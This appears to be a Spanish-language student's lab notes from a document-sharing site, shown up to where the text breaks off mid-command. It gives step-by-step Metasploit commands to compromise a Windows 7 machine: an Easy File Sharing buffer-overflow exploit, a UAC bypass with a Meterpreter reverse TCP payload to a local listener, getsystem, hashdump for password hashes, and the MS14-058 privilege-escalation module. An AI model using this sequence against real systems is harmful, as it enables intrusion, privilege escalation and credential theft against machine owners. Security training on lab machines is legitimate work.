Prueba Para entar.... msfconsole
Enviado por monto2435 • 31 de Octubre de 2018 • 844 Palabras (4 Páginas) • 449 Visitas
...
http://www.seguridadapple.com/2015/03/poc-proxy-prototype-privileged.html
-------------------------------------------------------------------------
---------------------
EXPLOTACION LOCAL
----------------------
aprovechando la ultimo ejemplo
accedemos con el ususrio Administrador de win 7(real) de la Maquina
Ejecutamos el Easy File...
use exploit/windows/http/efs_fmws_userid_bof (enter)
sessions -K (enter)
getuid (enter) nos damos cuenta que es el aministrado de la maquina
getprivs (enter) (nos muestra que tiente muchos privilegios)
uno importante es SeSystemEnvironmentPrivilegue
significa que puedor hacer cualquier cosa al sistema de win
getuid (enter)
run hashdump (enter) Almacena un fichero de hash
se trata de hacer un volcado de hashce
PERO NO ESTOY EN UN COTEXTO DE SYSTEM
getprivs (enter)
getsystems (enter) para poder hacer un volcado de hashses
getuid (enter)
run hashdump (enter)
exit
-----
Despues accedmeos con un usurio de grupo de adminsitradores
-----
y ejecutamos el Easy file
exploit (enter)
getuid (enter)
getprivs (enter)
--- no se puede hacer
getsystem
---mucho menos
run hashdump
----como sabemos que el ususrio es un usuario de grupo
de administradores
shell (enter)
c:\Windows\system32> net localgroup administrators (enter)
exit (enter)
--Entonces hay que hacer un bypass de UAC de la maquina
yy si UAC esta configurada por defecto.
background (enter)
use exploit/windows/local/bypassuac
(leer algunos articulo en los foros)
show options (enter)
--Dentro de esto hay al muy importate que la SESSION
QUE NOS DA un identificador
sessions (enter)
set SESSION 4 (enter)
set PAYLOAD windows/meterpreter/reverse_tcp (enter)
set LHOST 192.168.1.15 (enter)
exploit ( enter)
jobs -K (enter)
exploit ( enter)
---tras el efecto el bypass esta connseguido
pero si nos damos cuenta
getuid (enter)
--no somos ususrios system
--pero si enmeos privilegios
getprivs (enter)
--ya podemos hacer como system
getsystem (enter)
run hashdump (enter)
--cerramos la sessiones
background (enter)
sessions (enter)
sessions -K (enter)
--------------------------------------------------
ahora cuando el ususrio no es adminsitrador ni
pertenese al grupo admisnitrador
--------------------------------------------------
abrimos win con ese tipo de usuario
use exploit/windows/http/efs_fmws_userid_bof (enter)
exploit (enter)
getuid (enter)
--como vemos tenemos poco privilegios
--por lo que tendriamos que ver que parches tiene esta maquina
background (enter)
sessions -i 6 (enter)
shell (eneter)
systeminfo (enter)
----------------------
windows exploit suggester
herramienta para ver hacer un machin de los parche que existen y ver los que falta
y ver que exploit puedo ejecutar
----------------------
---Usariao iuun exploi local
exit (enter)
background (enter)
use /exploit/windows/local/ms14_058_track_popup_menu (enter)
set SESSION 6 (enter)
set PAYLOAD windows/meterpreter/reverse_tcp (enter)
set
...